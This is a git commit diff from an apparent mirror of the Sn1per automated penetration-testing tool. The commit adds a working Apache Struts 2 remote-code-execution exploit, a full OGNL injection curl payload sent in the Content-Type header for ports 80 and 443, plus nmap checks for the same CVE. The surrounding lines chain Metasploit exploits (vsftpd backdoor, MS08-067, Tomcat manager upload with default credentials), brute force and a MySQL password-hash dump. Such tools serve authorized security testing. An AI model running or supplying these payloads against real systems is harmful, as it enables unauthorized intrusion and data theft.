BitMaster/Sn1per
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Sn1per by 1N3@CrowdShield

Browse Source
This commit is contained in:
root
2017-03-16 12:33:11 -04:00
parent fe4587a34c
commit ff22eb92ff
3 changed files with 48 additions and 36 deletions
Download Patch File Download Diff File Expand all files Collapse all files

3
CHANGELOG.md
View File

@@ -1,4 +1,7 @@
## CHANGELOG:
* v2.3c - Added Apache Struts 2 RCE NMap script
* v2.3c - Added Apache Struts 2 RCE NMap exploit
* v2.3b - Changed NMap scan options to exclude ping sweeps (-P0)
* v2.3a - Fixed minor issue with MSSQL NMap script command (CC. @helo86)
* v2.3 - Fixed minor issues with missing $TARGET definitions for NMap (CC. @helo86)
* v2.2f - Added various optimizations and minor code fixes

2
install.sh
View File

@@ -47,6 +47,7 @@ echo -e "$OKORANGE + -- --=[Cleaning up old extensions...$RESET"
rm -Rf Findsploit/ BruteX/ Goohak/ XSSTracer/ MassBleed/ SuperMicro-Password-Scanner/ CMSmap/ yasuo/ Sublist3r/ shocker/ jexboss/ serializekiller/ testssl.sh/ SimpleEmailSpoofer/ ssh-audit/ plugins/ 2> /dev/null
mkdir $PLUGINS_DIR
cd $PLUGINS_DIR
mkdir -p $PLUGINS_DIR/nmap_scripts/ 2> /dev/null
echo -e "$OKORANGE + -- --=[Downloading extensions...$RESET"
git clone https://github.com/1N3/Findsploit.git
@@ -63,6 +64,7 @@ git clone https://github.com/nccgroup/shocker.git
git clone https://github.com/drwetter/testssl.sh.git
git clone https://github.com/lunarca/SimpleEmailSpoofer
git clone https://github.com/arthepsy/ssh-audit
wget https://svn.nmap.org/nmap/scripts/http-vuln-cve2017-5638.nse -O /usr/share/nmap/scripts/http-vuln-cve2017-5638.nse
echo -e "$OKORANGE + -- --=[Setting up environment...$RESET"
cd $PLUGINS_DIR/Findsploit/ && bash install.sh
cd $PLUGINS_DIR/BruteX/ && bash install.sh

79
sniper
View File

@@ -537,9 +537,9 @@ if [ "$MODE" = "fullportonly" ]; then
echo -e "$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Performing Port Scan]=------------------- -- +$RESET"
if [ -z "$OPT1" ]; then
nmap -T4 -sV -O -v -p 1-65535 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
nmap -T4 -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -O -v -p 1-65535 -P0 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
else
nmap -T4 -sV -O -v -p $OPT1 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
nmap -T4 -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -O -v -p $OPT1 -P0 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
fi
echo -e "$OKGREEN + -- ----------------------------=[Done]=------------------------------------ -- +$RESET"
exit
@@ -647,7 +647,7 @@ echo -e "$OKGREEN + -- ----------------------------=[Running TCP port scan]=----
if [ -z "$OPT1" ]; then
nmap -sS -T5 --open -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
elif [ "$OPT1" == "web" ]; then
nmap -sV -T5 -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
nmap -sV -T5 -p 80,443 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
else
nmap -sS -T5 -p $OPT1 --open $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
echo -e "$OKGREEN + -- ----------------------------=[Running UDP port scan]=------------------- -- +$RESET"
@@ -711,7 +711,7 @@ then
echo -e "$OKRED + -- --=[Port 21 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 21 opened... running tests...$RESET"
nmap -A -sV -sC -T5 -p 21 --script=ftp-* $TARGET
nmap -A -sV -sC -T5 -p 21 --script=ftp-* $TARGET
msfconsole -x "use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
fi
@@ -723,7 +723,7 @@ else
cd $PLUGINS_DIR/ssh-audit
python ssh-audit.py $TARGET:22
cd $INSTALL_DIR
nmap -A -sV -sC -T5 -p 22 --script=ssh-* $TARGET
nmap -A -sV -sC -T5 -p 22 --script=ssh-* $TARGET
msfconsole -x "use scanner/ssh/ssh_enumusers; setg USER_FILE "$USER_FILE"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/ssh/ssh_identify_pubkeys; run; use scanner/ssh/ssh_version; run; exit;"
fi
@@ -734,7 +734,7 @@ else
echo -e "$OKORANGE + -- --=[Port 23 opened... running tests...$RESET"
echo ""
cisco-torch -A $TARGET
nmap -A -sV -T5 --script=telnet* -p 23 $TARGET
nmap -A -sV -T5 --script=telnet* -p 23 $TARGET
msfconsole -x "use scanner/telnet/lantronix_telnet_password; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use scanner/telnet/lantronix_telnet_version; run; use scanner/telnet/telnet_encrypt_overflow; run; use scanner/telnet/telnet_ruggedcom; run; use scanner/telnet/telnet_version; run; exit;"
fi
@@ -743,7 +743,7 @@ then
echo -e "$OKRED + -- --=[Port 25 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 25 opened... running tests...$RESET"
nmap -A -sV -T5 --script=smtp* -p 25 $TARGET
nmap -A -sV -T5 --script=smtp* -p 25 $TARGET
smtp-user-enum -M VRFY -U $USER_FILE -t $TARGET
msfconsole -x "use scanner/smtp/smtp_enum; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; exit;"
fi
@@ -753,7 +753,7 @@ then
echo -e "$OKRED + -- --=[Port 53 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 53 opened... running tests...$RESET"
nmap -A -sU -sV -T5 --script=dns* -p U:53,T:53 $TARGET
nmap -A -sU -sV -T5 --script=dns* -p U:53,T:53 $TARGET
fi
if [ -z "$port_79" ];
@@ -761,7 +761,7 @@ then
echo -e "$OKRED + -- --=[Port 79 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 79 opened... running tests...$RESET"
nmap -A -sV -T5 --script=finger* -p 79 $TARGET
nmap -A -sV -T5 --script=finger* -p 79 $TARGET
bin/fingertool.sh $TARGET $USER_FILE
fi
@@ -838,7 +838,7 @@ else
then
echo -e "$OKGREEN + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
nmap -A -sV -T5 -p 80 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
nmap -A -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -T5 -p 80 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
dirb http://$TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
@@ -864,6 +864,8 @@ else
msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET"
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 80
echo -e "$OKGREEN + -- ----------------------------=[Running Apache Jakarta RCE Exploit]=------ -- +$RESET"
curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" http://$TARGET | head -n 1
fi
if [ $SCAN_TYPE == "DOMAIN" ];
@@ -882,7 +884,7 @@ then
echo -e "$OKRED + -- --=[Port 110 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 110 opened... running tests...$RESET"
nmap -A -sV -T5 --script=pop* -p 110 $TARGET
nmap -A -sV -T5 --script=pop* -p 110 $TARGET
fi
if [ -z "$port_111" ];
@@ -914,7 +916,7 @@ else
enum4linux $TARGET
python $SAMRDUMP $TARGET
nbtscan $TARGET
nmap -A -sV -T5 -p139 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
nmap -A -sV -T5 -p139 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
fi
@@ -1023,7 +1025,7 @@ else
if [ "$MODE" = "web" ];
then
echo -e "$OKGREEN + -- ----------------------------=[Running NMap HTTP Scripts]=--------------- -- +$RESET"
nmap -A -sV -T5 -p 443 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
nmap -A -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -T5 -p 443 --script=http-enum,http-headers,http-server-header,http-php-version,http-iis-webdav-vuln,http-vuln-*,http-phpmyadmin-dir-traversal $TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Directory Brute Force]=----------- -- +$RESET"
dirb https://$TARGET
echo -e "$OKGREEN + -- ----------------------------=[Running Wordpress Vulnerability Scans]=--- -- +$RESET"
@@ -1053,6 +1055,8 @@ else
msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 443; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
echo -e "$OKGREEN + -- ----------------------------=[Running ShellShock Auto-Scan Exploit]=---- -- +$RESET"
python $PLUGINS_DIR/shocker/shocker.py -H $TARGET --cgilist $PLUGINS_DIR/shocker/shocker-cgi_list --port 443 --ssl
echo -e "$OKGREEN + -- ----------------------------=[Running Apache Jakarta RCE Exploit]=------ -- +$RESET"
curl -s -H "Content-Type: %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" https://$TARGET | head -n 1
fi
if [ $SCAN_TYPE == "DOMAIN" ];
@@ -1079,7 +1083,7 @@ else
enum4linux $TARGET
python $SAMRDUMP $TARGET
nbtscan $TARGET
nmap -A -sV -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
nmap -A -sV -T5 -p445 --script=smb-server-stats --script=smb-ls --script=smb-enum-domains --script=smbv2-enabled --script=smb-psexec --script=smb-enum-groups --script=smb-enum-processes --script=smb-brute --script=smb-print-text --script=smb-security-mode --script=smb-os-discovery --script=smb-enum-sessions --script=smb-mbenum --script=smb-enum-users --script=smb-enum-shares --script=smb-system-info --script=smb-vuln-ms10-054 --script=smb-vuln-ms10-061 $TARGET
msfconsole -x "use auxiliary/scanner/smb/pipe_auditor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use auxiliary/scanner/smb/pipe_dcerpc_auditor; run; use auxiliary/scanner/smb/psexec_loggedin_users; run; use auxiliary/scanner/smb/smb2; run; use auxiliary/scanner/smb/smb_enum_gpp; run; use auxiliary/scanner/smb/smb_enumshares; run; use auxiliary/scanner/smb/smb_enumusers; run; use auxiliary/scanner/smb/smb_enumusers_domain; run; use auxiliary/scanner/smb/smb_login; run; use auxiliary/scanner/smb/smb_lookupsid; run; use auxiliary/scanner/smb/smb_uninit_cred; run; use auxiliary/scanner/smb/smb_version; run; use exploit/linux/samba/chain_reply; run; use windows/smb/ms08_067_netapi; run; exit;"
fi
@@ -1120,7 +1124,7 @@ then
echo -e "$OKRED + -- --=[Port 2049 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 2049 opened... running tests...$RESET"
nmap -A -sV -T5 --script=nfs* -p 2049 $TARGET
nmap -A -sV -T5 --script=nfs* -p 2049 $TARGET
rpcinfo -p $TARGET
showmount -e $TARGET
smbclient -L $TARGET -U " "%" "
@@ -1131,7 +1135,7 @@ then
echo -e "$OKRED + -- --=[Port 2121 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 2121 opened... running tests...$RESET"
nmap -A -sV -T5 --script=ftp* -p 2121 $TARGET
nmap -A -sV -T5 --script=ftp* -p 2121 $TARGET
msfconsole -x "setg PORT 2121; use exploit/unix/ftp/vsftpd_234_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; run; use unix/ftp/proftpd_133c_backdoor; run; exit;"
fi
@@ -1140,7 +1144,7 @@ then
echo -e "$OKRED + -- --=[Port 3306 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3306 opened... running tests...$RESET"
nmap -A -sV --script=mysql* -p 3306 $TARGET
nmap -A -sV --script=mysql* -p 3306 $TARGET
mysql -u root -h $TARGET -e 'SHOW DATABASES; SELECT Host,User,Password FROM mysql.user;'
fi
@@ -1149,7 +1153,7 @@ then
echo -e "$OKRED + -- --=[Port 3310 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3310 opened... running tests...$RESET"
nmap -A -p 3310 -T5 -sV --script clamav-exec $TARGET
nmap -A -p 3310 -T5 -sV --script clamav-exec $TARGET
fi
if [ -z "$port_3128" ];
@@ -1157,7 +1161,7 @@ then
echo -e "$OKRED + -- --=[Port 3128 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3128 opened... running tests...$RESET"
nmap -A -p 3128 -T5 -sV --script=*proxy* $TARGET
nmap -A -p 3128 -T5 -sV --script=*proxy* $TARGET
fi
if [ -z "$port_3389" ];
@@ -1165,7 +1169,7 @@ then
echo -e "$OKRED + -- --=[Port 3389 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3389 opened... running tests...$RESET"
nmap -A -sV -T5 --script=rdp-* -p 3389 $TARGET
nmap -A -sV -T5 --script=rdp-* -p 3389 $TARGET
rdesktop $TARGET &
fi
@@ -1174,7 +1178,7 @@ then
echo -e "$OKRED + -- --=[Port 3632 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 3632 opened... running tests...$RESET"
nmap -A -sV -T5 --script=distcc-* -p 3632 $TARGET
nmap -A -sV -T5 --script=distcc-* -p 3632 $TARGET
msfconsole -x "setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; use unix/misc/distcc_exec; run; exit;"
fi
@@ -1195,7 +1199,7 @@ else
cd $INSTALL_DIR
nikto -h https://$TARGET:4443
cutycapt --url=https://$TARGET:4443 --out=$LOOT_DIR/screenshots/$TARGET-port4443.jpg
nmap -A -p 4443 -T5 --script=*proxy* $TARGET
nmap -sV -A -p 4443 -T5 --script=*proxy* $TARGET
fi
if [ -z "$port_5432" ];
@@ -1203,7 +1207,7 @@ then
echo -e "$OKRED + -- --=[Port 5432 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 5432 opened... running tests...$RESET"
nmap -A -sV --script=pgsql-brute -p 5432 $TARGET
nmap -A -sV --script=pgsql-brute -p 5432 $TARGET
fi
if [ -z "$port_5800" ];
@@ -1211,7 +1215,7 @@ then
echo -e "$OKRED + -- --=[Port 5800 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 5800 opened... running tests...$RESET"
nmap -A -sV -T5 --script=vnc* -p 5800 $TARGET
nmap -A -sV -T5 --script=vnc* -p 5800 $TARGET
fi
if [ -z "$port_5900" ];
@@ -1219,7 +1223,7 @@ then
echo -e "$OKRED + -- --=[Port 5900 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 5900 opened... running tests...$RESET"
nmap -A -sV -T5 --script=vnc* -p 5900 $TARGET
nmap -A -sV -T5 --script=vnc* -p 5900 $TARGET
fi
if [ -z "$port_5984" ];
@@ -1227,7 +1231,7 @@ then
echo -e "$OKRED + -- --=[Port 5984 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 5984 opened... running tests...$RESET"
nmap -A -sV -T5 --script=couchdb* -p 5984 $TARGET
nmap -A -sV -T5 --script=couchdb* -p 5984 $TARGET
msfconsole -x "use auxiliary/scanner/couchdb/couchdb_enum; set RHOST "$TARGET"; run; exit;"
fi
@@ -1236,7 +1240,7 @@ then
echo -e "$OKRED + -- --=[Port 6000 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 6000 opened... running tests...$RESET"
nmap -A -sV -T5 --script=x11* -p 6000 $TARGET
nmap -A -sV -T5 --script=x11* -p 6000 $TARGET
fi
if [ -z "$port_6667" ];
@@ -1244,7 +1248,7 @@ then
echo -e "$OKRED + -- --=[Port 6667 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 6667 opened... running tests...$RESET"
nmap -A -sV -T5 --script=irc* -p 6667 $TARGET
nmap -A -sV -T5 --script=irc* -p 6667 $TARGET
msfconsole -x "use unix/irc/unreal_ircd_3281_backdoor; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; run; exit;"
fi
@@ -1261,6 +1265,7 @@ else
cd ..
nikto -h http://$TARGET:8000
cutycapt --url=http://$TARGET:8000 --out=$LOOT_DIR/screenshots/$TARGET-port8000.jpg
nmap -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8000 -T5 $TARGET
fi
if [ -z "$port_8100" ];
@@ -1279,6 +1284,7 @@ else
cd $INSTALL_DIR
nikto -h http://$TARGET:8100
cutycapt --url=http://$TARGET:8100 --out=$LOOT_DIR/screenshots/$TARGET-port8100.jpg
nmap -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8100 -T5 $TARGET
fi
if [ -z "$port_8080" ];
@@ -1297,7 +1303,7 @@ else
cd $INSTALL_DIR
nikto -h http://$TARGET:8080
cutycapt --url=http://$TARGET:8080 --out=$LOOT_DIR/screenshots/$TARGET-port8080.jpg
nmap -A -p 8080 -T5 --script=*proxy* $TARGET
nmap -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8080 -T5 --script=*proxy* $TARGET
msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8080; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
# EXPERIMENTAL - APACHE STRUTS RCE EXPLOIT
# msfconsole -x "use exploit/linux/http/apache_struts_rce_2016-3081; setg RHOSTS "$TARGET"; set PAYLOAD linux/x86/read_file; set PATH /etc/passwd; run;"
@@ -1320,7 +1326,7 @@ else
cd $INSTALL_DIR
nikto -h http://$TARGET:8180
cutycapt --url=http://$TARGET:8180 --out=$LOOT_DIR/screenshots/$TARGET-port8180.jpg
nmap -p 8180 -T5 --script=*proxy* $TARGET
nmap -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -p 8180 -T5 --script=*proxy* $TARGET
echo -e "$OKGREEN + -- ----------------------------=[Launching Webmin File Disclosure Exploit]= -- +$RESET"
echo -e "$OKGREEN + -- ----------------------------=[Launching Tomcat Exploits]=--------------- -- +$RESET"
msfconsole -x "use admin/http/tomcat_administration; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT 8180; run; use admin/http/tomcat_utf8_traversal; run; use scanner/http/tomcat_enum; run; use scanner/http/tomcat_mgr_login; run; use multi/http/tomcat_mgr_deploy; run; use multi/http/tomcat_mgr_upload; set USERNAME tomcat; set PASSWORD tomcat; run; exit;"
@@ -1343,7 +1349,7 @@ else
cd $INSTALL_DIR
nikto -h https://$TARGET:8443
cutycapt --url=https://$TARGET:8443 --out=$LOOT_DIR/screenshots/$TARGET-port8443.jpg
nmap -A -p 8443 -T5 --script=*proxy* $TARGET
nmap -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8443 -T5 --script=*proxy* $TARGET
fi
if [ -z "$port_8888" ];
@@ -1358,6 +1364,7 @@ else
xsstracer $TARGET 8888
nikto -h http://$TARGET:8888
cutycapt --url=https://$TARGET:8888 --out=$LOOT_DIR/screenshots/$TARGET-port8888.jpg
nmap -sV --script=/usr/share/nmap/scripts/http-vuln-cve2017-5638.nse -A -p 8888 -T5 $TARGET
fi
if [ -z "$port_10000" ];
@@ -1375,7 +1382,7 @@ then
echo -e "$OKRED + -- --=[Port 27017 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 27017 opened... running tests...$RESET"
nmap -p 27017 -T5 --script=mongodb* $TARGET
nmap -sV --script -p 27017 -T5 --script=mongodb* $TARGET
fi
if [ -z "$port_27018" ];
@@ -1383,7 +1390,7 @@ then
echo -e "$OKRED + -- --=[Port 27018 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 27018 opened... running tests...$RESET"
nmap -p 27018 -T5 --script=mongodb* $TARGET
nmap -sV -p 27018 -T5 --script=mongodb* $TARGET
fi
if [ -z "$port_27019" ];
@@ -1391,7 +1398,7 @@ then
echo -e "$OKRED + -- --=[Port 27019 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 27019 opened... running tests...$RESET"
nmap -p 27019 -T5 --script=mongodb* $TARGET
nmap -sV -p 27019 -T5 --script=mongodb* $TARGET
fi
if [ -z "$port_28017" ];
@@ -1399,7 +1406,7 @@ then
echo -e "$OKRED + -- --=[Port 28017 closed... skipping.$RESET"
else
echo -e "$OKORANGE + -- --=[Port 28017 opened... running tests...$RESET"
nmap -p 28017 -T5 --script=mongodb* $TARGET
nmap -sV -p 28017 -T5 --script=mongodb* $TARGET
fi
if [ -z "$port_49152" ];
@@ -1419,7 +1426,7 @@ if [ "$FULLNMAPSCAN" = "0" ]; then
echo -e "$OKGREEN + -- ----------------------------=[Skipping Full NMap Port Scan]=------------ -- +$RESET"
else
echo -e "$OKGREEN + -- ----------------------------=[Performing Full NMap Port Scan]=---------- -- +$RESET"
nmap -T4 -sV -O -v -p 1-65355 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
nmap -T4 -sV -O -v -p 1-65355 $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml
fi
if [ "$AUTOBRUTE" = "0" ]; then